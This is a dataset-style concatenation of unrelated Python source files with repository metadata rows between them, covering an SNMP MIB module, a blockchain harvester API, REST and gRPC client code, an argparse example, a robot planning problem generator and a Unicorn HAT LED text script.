etsysRadiusAcctClientMIBComplianceV3 = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1, 4)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientMIBGroupV3"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBComplianceV3 = etsysRadiusAcctClientMIBComplianceV3.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBComplianceV3.setDescription('The compliance statement for Accounting clients implementing the RADIUS Accounting Client MIB.')
mibBuilder.exportSymbols("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", etsysRadiusAcctClientMIBGroupV3=etsysRadiusAcctClientMIBGroupV3, etsysRadiusAcctClientServerPortNumber=etsysRadiusAcctClientServerPortNumber, etsysRadiusAcctClientServerTable=etsysRadiusAcctClientServerTable, etsysRadiusAcctClientMIBCompliance=etsysRadiusAcctClientMIBCompliance, etsysRadiusAcctClientMIBComplianceV2=etsysRadiusAcctClientMIBComplianceV2, etsysRadiusAcctClientServerAddressType=etsysRadiusAcctClientServerAddressType, etsysRadiusAcctClientServerIntervalMinimum=etsysRadiusAcctClientServerIntervalMinimum, etsysRadiusAcctClientMIBGroup=etsysRadiusAcctClientMIBGroup, etsysRadiusAcctClientServerUpdateInterval=etsysRadiusAcctClientServerUpdateInterval, etsysRadiusAcctClientMIBCompliances=etsysRadiusAcctClientMIBCompliances, etsysRadiusAcctClientIntervalMinimum=etsysRadiusAcctClientIntervalMinimum, etsysRadiusAcctClientEnable=etsysRadiusAcctClientEnable, etsysRadiusAcctClientServerClearTime=etsysRadiusAcctClientServerClearTime, etsysRadiusAcctClientServerStatus=etsysRadiusAcctClientServerStatus, etsysRadiusAcctClientMIBObjects=etsysRadiusAcctClientMIBObjects, etsysRadiusAcctClientServerSecretEntered=etsysRadiusAcctClientServerSecretEntered, etsysRadiusAcctClientServerRetryTimeout=etsysRadiusAcctClientServerRetryTimeout, etsysRadiusAcctClientMIB=etsysRadiusAcctClientMIB, PYSNMP_MODULE_ID=etsysRadiusAcctClientMIB, etsysRadiusAcctClientMIBComplianceV3=etsysRadiusAcctClientMIBComplianceV3, etsysRadiusAcctClientServerIndex=etsysRadiusAcctClientServerIndex, etsysRadiusAcctClientServerEntry=etsysRadiusAcctClientServerEntry, etsysRadiusAcctClientServerRetries=etsysRadiusAcctClientServerRetries, etsysRadiusAcctClientMIBConformance=etsysRadiusAcctClientMIBConformance, etsysRadiusAcctClientServerAddress=etsysRadiusAcctClientServerAddress, etsysRadiusAcctClientServerSecret=etsysRadiusAcctClientServerSecret, etsysRadiusAcctClientUpdateInterval=etsysRadiusAcctClientUpdateInterval, 
etsysRadiusAcctClientMIBGroups=etsysRadiusAcctClientMIBGroups, etsysRadiusAcctClientMIBGroupV2=etsysRadiusAcctClientMIBGroupV2)
| 226.435185 | 2,097 | 0.819832 |
e5f7b1b8b277e98e6e63a0747f18ce032b133346 | 15,370 | py | Python | beet/harvester/harvester_api.py | beetseeds/beet-blockchain-1 | e5d93f1f9041c48dd0c38416d845c8675bf22738 | [
"Apache-2.0"
] | 7 | 2021-08-29T15:12:25.000Z | 2022-02-09T04:28:38.000Z | beet/harvester/harvester_api.py | beetseeds/beet-blockchain-1 | e5d93f1f9041c48dd0c38416d845c8675bf22738 | [
"Apache-2.0"
] | null | null | null | beet/harvester/harvester_api.py | beetseeds/beet-blockchain-1 | e5d93f1f9041c48dd0c38416d845c8675bf22738 | [
"Apache-2.0"
] | 3 | 2021-09-04T10:32:00.000Z | 2022-03-15T08:44:25.000Z | import asyncio
import time
from pathlib import Path
from typing import Callable, List, Tuple
from blspy import AugSchemeMPL, G2Element, G1Element
from beet.consensus.pot_iterations import calculate_iterations_quality, calculate_sp_interval_iters
from beet.harvester.harvester import Harvester
from beet.plotting.plot_tools import PlotInfo, parse_plot_info
from beet.protocols import harvester_protocol
from beet.protocols.farmer_protocol import FarmingInfo
from beet.protocols.harvester_protocol import Plot
from beet.protocols.protocol_message_types import ProtocolMessageTypes
from beet.server.outbound_message import make_msg
from beet.server.ws_connection import WSbeetConnection
from beet.types.blockchain_format.proof_of_space import ProofOfSpace
from beet.types.blockchain_format.sized_bytes import bytes32
from beet.util.api_decorators import api_request, peer_required
from beet.util.ints import uint8, uint32, uint64
from beet.wallet.derive_keys import master_sk_to_local_sk
class HarvesterAPI:
    """API surface of the harvester service.

    Each ``@api_request`` coroutine handles one inbound protocol message
    (sent by the farmer) and may return an outbound message to send back.
    """

    # The harvester service instance all handlers delegate to.
    harvester: Harvester

    def __init__(self, harvester: Harvester):
        self.harvester = harvester

    def _set_state_changed_callback(self, callback: Callable):
        # Forward state-change notifications from the server layer to the service.
        self.harvester.state_changed_callback = callback

    @api_request
    async def harvester_handshake(self, harvester_handshake: harvester_protocol.HarvesterHandshake):
        """
        Handshake between the harvester and farmer. The harvester receives the pool public keys,
        as well as the farmer pks, which must be put into the plots, before the plotting process begins.
        We cannot use any plots which have different keys in them.
        """
        self.harvester.farmer_public_keys = harvester_handshake.farmer_public_keys
        self.harvester.pool_public_keys = harvester_handshake.pool_public_keys
        # Re-scan plot directories now that we know which keys are usable.
        await self.harvester.refresh_plots()
        if len(self.harvester.provers) == 0:
            self.harvester.log.warning("Not farming any plots on this harvester. Check your configuration.")
        return None

    @peer_required
    @api_request
    async def new_signage_point_harvester(
        self, new_challenge: harvester_protocol.NewSignagePointHarvester, peer: WSbeetConnection
    ):
        """
        The harvester receives a new signage point from the farmer, this happens at the start of each slot.
        The harvester does a few things:
        1. The harvester applies the plot filter for each of the plots, to select the proportion which are eligible
        for this signage point and challenge.
        2. The harvester gets the qualities for each plot. This is approximately 7 reads per plot which qualifies.
        Note that each plot may have 0, 1, 2, etc qualities for that challenge: but on average it will have 1.
        3. Checks the required_iters for each quality and the given signage point, to see which are eligible for
        inclusion (required_iters < sp_interval_iters).
        4. Looks up the full proof of space in the plot for each quality, approximately 64 reads per quality
        5. Returns the proof of space to the farmer
        """
        if len(self.harvester.pool_public_keys) == 0 or len(self.harvester.farmer_public_keys) == 0:
            # This means that we have not received the handshake yet
            return None
        start = time.time()
        assert len(new_challenge.challenge_hash) == 32
        # Refresh plots to see if there are any new ones
        if start - self.harvester.last_load_time > self.harvester.plot_load_frequency:
            await self.harvester.refresh_plots()
            self.harvester.last_load_time = time.time()
        loop = asyncio.get_running_loop()

        def blocking_lookup(filename: Path, plot_info: PlotInfo) -> List[Tuple[bytes32, ProofOfSpace]]:
            # Uses the DiskProver object to lookup qualities. This is a blocking call,
            # so it should be run in a thread pool.
            try:
                plot_id = plot_info.prover.get_id()
                sp_challenge_hash = ProofOfSpace.calculate_pos_challenge(
                    plot_id,
                    new_challenge.challenge_hash,
                    new_challenge.sp_hash,
                )
                try:
                    quality_strings = plot_info.prover.get_qualities_for_challenge(sp_challenge_hash)
                except Exception as e:
                    self.harvester.log.error(f"Error using prover object {e}")
                    self.harvester.log.error(
                        f"File: (unknown) Plot ID: {plot_id.hex()}, "
                        f"challenge: {sp_challenge_hash}, plot_info: {plot_info}"
                    )
                    return []
                responses: List[Tuple[bytes32, ProofOfSpace]] = []
                if quality_strings is not None:
                    difficulty = new_challenge.difficulty
                    sub_slot_iters = new_challenge.sub_slot_iters
                    if plot_info.pool_contract_puzzle_hash is not None:
                        # If we are pooling, override the difficulty and sub slot iters with the pool threshold info.
                        # This will mean more proofs actually get found, but they are only submitted to the pool,
                        # not the blockchain
                        for pool_difficulty in new_challenge.pool_difficulties:
                            if pool_difficulty.pool_contract_puzzle_hash == plot_info.pool_contract_puzzle_hash:
                                difficulty = pool_difficulty.difficulty
                                sub_slot_iters = pool_difficulty.sub_slot_iters
                    # Found proofs of space (on average 1 is expected per plot)
                    for index, quality_str in enumerate(quality_strings):
                        required_iters: uint64 = calculate_iterations_quality(
                            self.harvester.constants.DIFFICULTY_CONSTANT_FACTOR,
                            quality_str,
                            plot_info.prover.get_size(),
                            difficulty,
                            new_challenge.sp_hash,
                        )
                        sp_interval_iters = calculate_sp_interval_iters(self.harvester.constants, sub_slot_iters)
                        if required_iters < sp_interval_iters:
                            # Found a very good proof of space! will fetch the whole proof from disk,
                            # then send to farmer
                            try:
                                proof_xs = plot_info.prover.get_full_proof(
                                    sp_challenge_hash, index, self.harvester.parallel_read
                                )
                            except Exception as e:
                                self.harvester.log.error(f"Exception fetching full proof for (unknown). {e}")
                                self.harvester.log.error(
                                    f"File: (unknown) Plot ID: {plot_id.hex()}, challenge: {sp_challenge_hash}, "
                                    f"plot_info: {plot_info}"
                                )
                                continue
                            # Look up local_sk from plot to save locked memory
                            (
                                pool_public_key_or_puzzle_hash,
                                farmer_public_key,
                                local_master_sk,
                            ) = parse_plot_info(plot_info.prover.get_memo())
                            local_sk = master_sk_to_local_sk(local_master_sk)
                            include_taproot = plot_info.pool_contract_puzzle_hash is not None
                            plot_public_key = ProofOfSpace.generate_plot_public_key(
                                local_sk.get_g1(), farmer_public_key, include_taproot
                            )
                            responses.append(
                                (
                                    quality_str,
                                    ProofOfSpace(
                                        sp_challenge_hash,
                                        plot_info.pool_public_key,
                                        plot_info.pool_contract_puzzle_hash,
                                        plot_public_key,
                                        uint8(plot_info.prover.get_size()),
                                        proof_xs,
                                    ),
                                )
                            )
                return responses
            except Exception as e:
                self.harvester.log.error(f"Unknown error: {e}")
                return []

        async def lookup_challenge(
            filename: Path, plot_info: PlotInfo
        ) -> Tuple[Path, List[harvester_protocol.NewProofOfSpace]]:
            # Executes a DiskProverLookup in a thread pool, and returns responses
            all_responses: List[harvester_protocol.NewProofOfSpace] = []
            if self.harvester._is_shutdown:
                return filename, []
            proofs_of_space_and_q: List[Tuple[bytes32, ProofOfSpace]] = await loop.run_in_executor(
                self.harvester.executor, blocking_lookup, filename, plot_info
            )
            for quality_str, proof_of_space in proofs_of_space_and_q:
                all_responses.append(
                    harvester_protocol.NewProofOfSpace(
                        new_challenge.challenge_hash,
                        new_challenge.sp_hash,
                        quality_str.hex() + str(filename.resolve()),
                        proof_of_space,
                        new_challenge.signage_point_index,
                    )
                )
            return filename, all_responses

        awaitables = []
        passed = 0
        total = 0
        for try_plot_filename, try_plot_info in self.harvester.provers.items():
            try:
                if try_plot_filename.exists():
                    # Passes the plot filter (does not check sp filter yet though, since we have not reached sp)
                    # This is being executed at the beginning of the slot
                    total += 1
                    if ProofOfSpace.passes_plot_filter(
                        self.harvester.constants,
                        try_plot_info.prover.get_id(),
                        new_challenge.challenge_hash,
                        new_challenge.sp_hash,
                    ):
                        passed += 1
                        awaitables.append(lookup_challenge(try_plot_filename, try_plot_info))
            except Exception as e:
                self.harvester.log.error(f"Error plot file {try_plot_filename} may no longer exist {e}")

        # Concurrently executes all lookups on disk, to take advantage of multiple disk parallelism
        total_proofs_found = 0
        for filename_sublist_awaitable in asyncio.as_completed(awaitables):
            filename, sublist = await filename_sublist_awaitable
            time_taken = time.time() - start
            if time_taken > 5:
                self.harvester.log.warning(
                    f"Looking up qualities on (unknown) took: {time_taken}. This should be below 5 seconds "
                    f"to minimize risk of losing rewards."
                )
            else:
                pass
                # If you want additional logs, uncomment the following line
                # self.harvester.log.debug(f"Looking up qualities on (unknown) took: {time_taken}")
            for response in sublist:
                total_proofs_found += 1
                msg = make_msg(ProtocolMessageTypes.new_proof_of_space, response)
                await peer.send_message(msg)

        # Summarize this signage point's results for the farmer's stats display.
        now = uint64(int(time.time()))
        farming_info = FarmingInfo(
            new_challenge.challenge_hash,
            new_challenge.sp_hash,
            now,
            uint32(passed),
            uint32(total_proofs_found),
            uint32(total),
        )
        pass_msg = make_msg(ProtocolMessageTypes.farming_info, farming_info)
        await peer.send_message(pass_msg)
        self.harvester.log.info(
            f"{len(awaitables)} plots were eligible for farming {new_challenge.challenge_hash.hex()[:10]}..."
            f" Found {total_proofs_found} proofs. Time: {time.time() - start:.5f} s. "
            f"Total {len(self.harvester.provers)} plots"
        )

    @api_request
    async def request_signatures(self, request: harvester_protocol.RequestSignatures):
        """
        The farmer requests a signature on the header hash, for one of the proofs that we found.
        A signature is created on the header hash using the harvester private key. This can also
        be used for pooling.
        """
        # The plot identifier is <64 hex chars of quality> + <absolute file path>.
        plot_filename = Path(request.plot_identifier[64:]).resolve()
        try:
            plot_info = self.harvester.provers[plot_filename]
        except KeyError:
            self.harvester.log.warning(f"KeyError plot {plot_filename} does not exist.")
            return None
        # Look up local_sk from plot to save locked memory
        (
            pool_public_key_or_puzzle_hash,
            farmer_public_key,
            local_master_sk,
        ) = parse_plot_info(plot_info.prover.get_memo())
        local_sk = master_sk_to_local_sk(local_master_sk)
        # Pool-contract plots (puzzle hash in the memo) require a taproot component.
        if isinstance(pool_public_key_or_puzzle_hash, G1Element):
            include_taproot = False
        else:
            assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
            include_taproot = True
        agg_pk = ProofOfSpace.generate_plot_public_key(local_sk.get_g1(), farmer_public_key, include_taproot)
        # This is only a partial signature. When combined with the farmer's half, it will
        # form a complete PrependSignature.
        message_signatures: List[Tuple[bytes32, G2Element]] = []
        for message in request.messages:
            signature: G2Element = AugSchemeMPL.sign(local_sk, message, agg_pk)
            message_signatures.append((message, signature))
        response: harvester_protocol.RespondSignatures = harvester_protocol.RespondSignatures(
            request.plot_identifier,
            request.challenge_hash,
            request.sp_hash,
            local_sk.get_g1(),
            farmer_public_key,
            message_signatures,
        )
        return make_msg(ProtocolMessageTypes.respond_signatures, response)

    @api_request
    async def request_plots(self, _: harvester_protocol.RequestPlots):
        """Return the harvester's plot inventory, including files that failed to open or had no keys."""
        plots_response = []
        plots, failed_to_open_filenames, no_key_filenames = self.harvester.get_plots()
        for plot in plots:
            plots_response.append(
                Plot(
                    plot["filename"],
                    plot["size"],
                    plot["plot_id"],
                    plot["pool_public_key"],
                    plot["pool_contract_puzzle_hash"],
                    plot["plot_public_key"],
                    plot["file_size"],
                    plot["time_modified"],
                )
            )
        response = harvester_protocol.RespondPlots(plots_response, failed_to_open_filenames, no_key_filenames)
        return make_msg(ProtocolMessageTypes.respond_plots, response)
| 49.105431 | 117 | 0.590046 |
a4be31e0900da710467865b5b3ef869c46f96125 | 1,063 | py | Python | JumpscaleLib/clients/itsyouonline/generated/client/AddIncludeSubOrgsOfReqBody.py | threefoldtech/jumpscale_lib9 | 03c1451133d777e5af106fcc6f75c1138bb997f2 | [
"Apache-2.0"
] | null | null | null | JumpscaleLib/clients/itsyouonline/generated/client/AddIncludeSubOrgsOfReqBody.py | threefoldtech/jumpscale_lib9 | 03c1451133d777e5af106fcc6f75c1138bb997f2 | [
"Apache-2.0"
] | 220 | 2018-07-29T08:37:17.000Z | 2019-08-05T15:01:27.000Z | JumpscaleLib/clients/itsyouonline/generated/client/AddIncludeSubOrgsOfReqBody.py | threefoldtech/jumpscale_lib9 | 03c1451133d777e5af106fcc6f75c1138bb997f2 | [
"Apache-2.0"
] | 1 | 2018-08-20T09:16:08.000Z | 2018-08-20T09:16:08.000Z | """
Auto-generated class for AddIncludeSubOrgsOfReqBody
"""
from six import string_types
from jumpscale import j
from . import client_support
class AddIncludeSubOrgsOfReqBody():
    """
    auto-generated. don't touch.

    Request body carrying the ``globalid`` of an organization whose
    sub-organizations should be included.
    """

    @staticmethod
    def create(**kwargs):
        """
        Build an instance from keyword arguments.

        :type globalid: str
        :rtype: AddIncludeSubOrgsOfReqBody
        """
        return AddIncludeSubOrgsOfReqBody(**kwargs)

    def __init__(self, json=None, **kwargs):
        """Initialize from a JSON-style dict (``json``) or from keyword arguments.

        :raises ValueError: if neither ``json`` nor keyword arguments are given.
        """
        # BUG FIX: removed a stray, dead ``pass`` statement that preceded the body.
        if json is None and not kwargs:
            raise ValueError('No data or kwargs present')

        class_name = 'AddIncludeSubOrgsOfReqBody'
        data = json or kwargs

        # set attributes
        data_types = [string_types]
        self.globalid = client_support.set_property('globalid', data, data_types, False, [], False, True, class_name)

    def __str__(self):
        return self.as_json(indent=4)

    def as_json(self, indent=0):
        return client_support.to_json(self, indent=indent)

    def as_dict(self):
        return client_support.to_dict(self)
| 24.72093 | 117 | 0.650047 |
87581d07e4a5f55bb5cd744d1c0307c91f81198d | 530 | py | Python | docs/examples/expose_multiple_functions_as_commands/main.py | attilammagyar/argparse_action | f4dcaaa503560cea205b4baecd4c9a861cd7249e | [
"Apache-2.0"
] | 4 | 2021-03-01T12:05:45.000Z | 2022-01-22T10:03:29.000Z | docs/examples/expose_multiple_functions_as_commands/main.py | attilammagyar/argparse_action | f4dcaaa503560cea205b4baecd4c9a861cd7249e | [
"Apache-2.0"
] | 10 | 2020-12-20T14:58:29.000Z | 2022-01-23T20:09:29.000Z | docs/examples/expose_multiple_functions_as_commands/main.py | attilammagyar/argparse_action | f4dcaaa503560cea205b4baecd4c9a861cd7249e | [
"Apache-2.0"
] | 1 | 2022-01-21T22:18:05.000Z | 2022-01-21T22:18:05.000Z | "Expose multiple functions as commands"
import sys
import argparse
import argparse_action
def main():
    """Parse the command line and dispatch to the selected sub-command."""
    # argparse_action stores the chosen command's handler on the ``action``
    # attribute of the parsed namespace.
    parsed_args = parser.parse_args()
    parsed_args.action(parsed_args)
# Build the CLI parser; the module docstring doubles as its description.
parser = argparse.ArgumentParser(description=__doc__)
# Wrap the parser so plain functions can be registered as sub-commands.
action = argparse_action.Action(parser)
@action.add()
def echo(parameter):
    "echo the cli argument"
    # NOTE(review): argparse_action presumably uses this docstring as the
    # sub-command's help text, so it is left unchanged.
    print(parameter)
@action.add()
def oche(parameter):
    "echo the reversed cli argument"
    # Idiom fix: a negative-step slice replaces the manual
    # list() / reverse() / "".join() dance; output is identical.
    # (Also fixed the "revered" typo in the help docstring.)
    print(parameter[::-1])
# Run the CLI only when executed as a script.
if __name__ == "__main__":
    main()
| 19.62963 | 53 | 0.715094 |
ba6e4377364366c5d29fc1b86775893cf9ca1bc4 | 5,640 | py | Python | opentamp/src/core/util_classes/hsr_prob_gen.py | Algorithmic-Alignment-Lab/openTAMP-legacy | 3b7c3be164cc968ad77a928286d6460cd70a670e | [
"MIT"
] | 2 | 2022-03-09T19:48:20.000Z | 2022-03-26T17:31:07.000Z | opentamp/src/core/util_classes/hsr_prob_gen.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | opentamp/src/core/util_classes/hsr_prob_gen.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | from IPython import embed as shell
import itertools
import numpy as np
import random
import core.util_classes.hsr_constants as const
# SEED = 1234
# How many problem instances / movable objects / pose symbols to generate.
NUM_PROBS = 1
NUM_OBJS = 1
NUM_SYMBOLS = NUM_OBJS
# filename = "hsr_probs/hsr.prob"
# Goal predicate written into the generated problem file.
GOAL = "(HSRRobotAt hsr robot_end_pose)"
# Initial HSR base pose and 5-DOF arm configuration.
HSR_INIT_POSE = [0, 0, 0]
HSR_INIT_ARM = [0, 0, 0, 0, 0] # [0.5, -np.pi/2, 0, -np.pi/2, 0]
# Gripper joint values for the open/closed states (from hsr_constants).
INT_GRIPPER = [const.GRIPPER_OPEN]
CLOSE_GRIPPER = [const.GRIPPER_CLOSE]
# Can geometry parameters -- NOTE(review): presumably [radius, height] in meters; confirm.
CAN_GEOM = [0.02, 0.02]
ROBOT_DIST_FROM_TABLE = 0.05
# TABLE_GEOM = [1.4, 1.4, 0.97/2]
TABLE_GEOM = [0.3, 0.6, 0.4/2]
# TABLE_POS = [0, 0, 0.97/2-0.375]
TABLE_POS = [1.75, 0.0, 0.4/2]
TABLE_ROT = [0,0,0]
def get_hsr_str(name, ARM = HSR_INIT_ARM, G = INT_GRIPPER, Pos = HSR_INIT_POSE):
    """Serialize an HSR robot object's geom/arm/gripper/pose attributes for the problem file."""
    # Note: the original format deliberately has no ", " after the geom entry.
    return (
        f"(geom {name})"
        f"(arm {name} {ARM}), "
        f"(gripper {name} {G}), "
        f"(pose {name} {Pos}), "
    )
def get_robot_pose_str(name, ARM = HSR_INIT_ARM, G = INT_GRIPPER, Pos = HSR_INIT_POSE):
    """Serialize a RobotPose symbol's arm/gripper/value attributes for the problem file."""
    return (
        f"(arm {name} {ARM}), "
        f"(gripper {name} {G}), "
        f"(value {name} {Pos}), "
    )
def get_undefined_robot_pose_str(name):
    """Serialize a RobotPose symbol whose arm/gripper/value are still undefined."""
    return "".join(
        "({} {} undefined), ".format(attr, name) for attr in ("arm", "gripper", "value")
    )
def get_undefined_symbol(name):
    """Serialize a pose symbol whose value and rotation are still undefined."""
    return f"(value {name} undefined), (rotation {name} undefined), "
def save_prob(filename, obstacles=[]):
    """Write a CAN problem-instance configuration file to ``filename``.

    The file has three sections: ``Objects:`` (symbol declarations),
    ``Init:`` (initial attribute values) and ``Goal:`` (the GOAL predicate).

    :param filename: path the generated problem file is written to.
    :param obstacles: iterable of (name, geom, pose, rotation) tuples.
        NOTE(review): ``[]`` is a mutable default; it is only iterated here
        so it is harmless, but ``()`` would be the safer spelling.
    """
    # --- Objects section: declare every symbol used by the problem ---
    s = "# AUTOGENERATED. DO NOT EDIT.\n# Configuration file for CAN problem instance. Blank lines and lines beginning with # are filtered out.\n\n"
    s += "# The values after each attribute name are the values that get passed into the __init__ method for that attribute's class defined in the domain configuration.\n"
    s += "Objects: "
    s += "Robot (name {}); ".format("hsr")
    for i in range(NUM_OBJS):
        # Per-can symbols: the can itself, its targets, and grasp/putdown poses.
        s += "Can (name can{0}); ".format(i)
        s += "CanTarget (name can{0}_init_target); ".format(i)
        s += "CanTarget (name can{0}_end_target); ".format(i)
        s += "RobotPose (name {}); ".format("can_grasp_begin_{0}".format(i))
        s += "RobotPose (name {}); ".format("can_grasp_end_{0}".format(i))
        s += "RobotPose (name {}); ".format("can_putdown_begin_{0}".format(i))
        s += "RobotPose (name {}); ".format("can_putdown_end_{0}".format(i))
        s += "EEPose (name {}); ".format("cg_ee_{0}".format(i))
        s += "EEPose (name {}); ".format("cp_ee_{0}".format(i))
    # Shared (non-indexed) symbols.
    s += "EEPose (name cg_ee); "
    s += "EEPose (name cp_ee); "
    s += "RobotPose (name {}); ".format("robot_init_pose")
    s += "RobotPose (name {}); ".format("robot_end_pose")
    s += "RobotPose (name {}); ".format("can_grasp_begin")
    s += "RobotPose (name {}); ".format("can_grasp_end")
    s += "RobotPose (name {}); ".format("can_putdown_begin")
    s += "RobotPose (name {}); ".format("can_putdown_end")
    s += "CanTarget (name {}); ".format("can_end_target")
    for o in obstacles:
        s += "Obstacle (name {}); ".format(o[0])
    # s += "Obstacle (name {}); \n\n".format("table")
    s += "\n\n"

    # --- Init section: concrete values for known symbols, "undefined" for the rest ---
    s += "Init: "
    s += get_hsr_str('hsr', HSR_INIT_ARM, INT_GRIPPER, HSR_INIT_POSE)
    s += get_robot_pose_str('robot_init_pose', HSR_INIT_ARM, INT_GRIPPER, HSR_INIT_POSE)
    s += get_undefined_robot_pose_str("can_grasp_begin")
    s += get_undefined_robot_pose_str("can_grasp_end")
    s += get_undefined_robot_pose_str("can_putdown_begin")
    s += get_undefined_robot_pose_str("can_putdown_end")
    s += get_undefined_symbol("cg_ee")
    s += get_undefined_symbol("cp_ee")
    for i in range(NUM_SYMBOLS):
        s += get_undefined_robot_pose_str("can_grasp_begin_{0}".format(i))
        s += get_undefined_robot_pose_str("can_grasp_end_{0}".format(i))
        s += get_undefined_robot_pose_str("can_putdown_begin_{0}".format(i))
        s += get_undefined_robot_pose_str("can_putdown_end_{0}".format(i))
        s += get_undefined_symbol("cg_ee_{0}".format(i))
        s += get_undefined_symbol("cp_ee_{0}".format(i))
    for i in range(NUM_OBJS):
        s += "(geom can{} {} {}), ".format(i, CAN_GEOM[0], CAN_GEOM[1])
        s += "(pose can{} {}), ".format(i, [2, 2, 0])
        s += "(rotation can{} {}),".format(i, [0, 0, 0])
        s += "(value can{0}_init_target {1}), ".format(i, [0, 0, 0.615])
        s += "(rotation can{0}_init_target {1}), ".format(i, [0, 0, 0])
        s += "(value can{0}_end_target {1}), ".format(i, [0, 0, 0.615])
        s += "(rotation can{0}_end_target {1}), ".format(i, [0, 0, 0])
    s += get_undefined_robot_pose_str('robot_end_pose')
    for o in obstacles:
        # o = (name, geom, pose, rotation)
        s += "(geom {} {}), ".format(o[0], o[1])
        s += "(pose {} {}), ".format(o[0], o[2])
        s += "(rotation {} {}), ".format(o[0], o[3])
    # s += "(geom table {}), ".format(TABLE_GEOM)
    # s += "(pose table {}), ".format(TABLE_POS)
    # s += "(rotation table {}); ".format(TABLE_ROT)
    s += "(value can_end_target {0}), ".format([0, 0, 0.615])
    s += "(rotation can_end_target {0}); ".format([0, 0, 0])
    # Initial predicates.
    s += "(HSRRobotAt hsr robot_init_pose), "
    s += "(HSRIsMP hsr), "
    s += "(HSRWithinJointLimit hsr) \n\n"
    # for i in range(NUM_OBJS):
    #     s += "(HSRCanGraspValid cg_ee_{0} can{0}_init_target), ".format(i)
    #     s += "(HSRCanGraspValid cp_ee_{0} can{0}_end_target), ".format(i)
    # s += "(HSRStationaryW table) \n\n"

    # --- Goal section ---
    s += "Goal: {}".format(GOAL)

    with open(filename, "w") as f:
        f.write(s)
if __name__ == "__main__":
    # BUG FIX: this used to call ``save_prob(filename)``, but ``filename`` is
    # only defined in a commented-out line above, so running the module raised
    # NameError. Pass the intended default path explicitly instead.
    save_prob("hsr_probs/hsr.prob")
| 37.350993 | 171 | 0.589184 |
ab0d66b457cbe33a8ad8d40d96a6c03fbdd9f1ae | 469 | py | Python | tutorials/python/essential-libraries/requests/2-handle-reqs.py | Fe-Nick-S/experiments | 9be65b9c97243aac6e50b95e5059667c423a47d8 | [
"MIT"
] | 2 | 2018-10-06T08:29:05.000Z | 2018-10-06T08:29:08.000Z | tutorials/python/essential-libraries/requests/2-handle-reqs.py | Fe-Nick-S/experiments | 9be65b9c97243aac6e50b95e5059667c423a47d8 | [
"MIT"
] | 2 | 2020-01-28T23:02:15.000Z | 2020-07-07T20:22:02.000Z | tutorials/python/essential-libraries/requests/2-handle-reqs.py | Fe-Nick-S/experiments | 9be65b9c97243aac6e50b95e5059667c423a47d8 | [
"MIT"
] | null | null | null |
import requests
# handle with status codes
# httpbin's /status/<code> endpoint echoes back the requested status code.
resp = requests.get("https://httpbin.org/status/200")
print(resp.status_code)
resp = requests.get("https://httpbin.org/status/404")
print(resp.status_code)
# raise_for_status() would raise requests.HTTPError for 4xx/5xx responses:
#resp.raise_for_status()
# examine response encoding
# .text decodes the body using .encoding; .content is the raw bytes.
resp = requests.get("https://httpbin.org/html")
print(resp.encoding)
print(resp.text)
print(resp.content)
# use json content
# .json() parses the response body as JSON into Python objects.
resp = requests.get("https://httpbin.org/json")
print(resp.json())
print(resp.headers)
| 21.318182 | 53 | 0.752665 |
65ce1cc22835116484e9e8d1fd3dab4f48c48f62 | 558 | py | Python | client.py | rvitorgomes/rpc18 | 10f2276fee2dd95e8cae4dc145bafd8fd520877c | [
"MIT"
] | null | null | null | client.py | rvitorgomes/rpc18 | 10f2276fee2dd95e8cae4dc145bafd8fd520877c | [
"MIT"
] | null | null | null | client.py | rvitorgomes/rpc18 | 10f2276fee2dd95e8cae4dc145bafd8fd520877c | [
"MIT"
] | null | null | null | import grpc
import time
# import the generated classes
import calculator_pb2
import calculator_pb2_grpc
# open a gRPC channel to the local server
channel = grpc.insecure_channel('localhost:50051')
# create a stub (client)
stub = calculator_pb2_grpc.CalculatorStub(channel)
# create a valid request message
number = calculator_pb2.Number(value=123465)
# start computing the call time
t0 = time.time()
# make the call (blocking unary RPC)
response = stub.SquareRoot(number)
t1 = time.time()
# print the result and the round-trip time of the call
print(response.value)
# BUG FIX: the user-facing unit label was misspelled as "miliseconds".
print(format((t1-t0) * 1000, '.12f'), 'milliseconds')
896894868645dc633762b3c4ca9c6a092b96ce2c | 5,345 | py | Python | unicorn-hat/h5yr.py | CarlSargunar/FTC2021---Umbraco-Docker-Pi | 695e2cf9cb6b7ca7cf4e510313e5c931120af95a | [
"MIT"
] | null | null | null | unicorn-hat/h5yr.py | CarlSargunar/FTC2021---Umbraco-Docker-Pi | 695e2cf9cb6b7ca7cf4e510313e5c931120af95a | [
"MIT"
] | null | null | null | unicorn-hat/h5yr.py | CarlSargunar/FTC2021---Umbraco-Docker-Pi | 695e2cf9cb6b7ca7cf4e510313e5c931120af95a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import pika, sys, os
import unicornhathd
import colorsys
import time
from sys import exit
# Pillow is required to render the text image; exit with an install hint
# when it is missing instead of crashing later with an ImportError.
try:
    from PIL import Image, ImageDraw, ImageFont
except ImportError:
    exit('This script requires the pillow module\nInstall with: sudo pip install pillow')
def showText(text):
    """Scroll ``text`` across the Unicorn HAT HD with a rainbow hue sweep.

    Blocks until the full text has scrolled past (roughly 0.04 s per column).
    NOTE(review): ``font.getsize`` expects a string; callers passing bytes
    (e.g. a raw message payload) should decode first -- confirm.
    """
    # ========== Change the text you want to display, and font, here ================
    TEXT = text
    FONT = ('/usr/share/fonts/truetype/freefont/FreeSansBold.ttf', 10)

    width, height = unicornhathd.get_shape()
    unicornhathd.rotation(0)
    unicornhathd.brightness(0.5)

    # We want to draw our text 1 pixel in, and 2 pixels down from the top left corner
    text_x = 1
    text_y = 2

    # Grab our font file and size as defined at the top of the script
    font_file, font_size = FONT

    # Load the font using PIL's ImageFont
    font = ImageFont.truetype(font_file, font_size)

    # Ask the loaded font how big our text will be
    text_width, text_height = font.getsize(TEXT)

    # Make sure we accommodate enough width to account for our text_x left offset
    text_width += width + text_x

    # Now let's create a blank canvas wide enough to accommodate our text
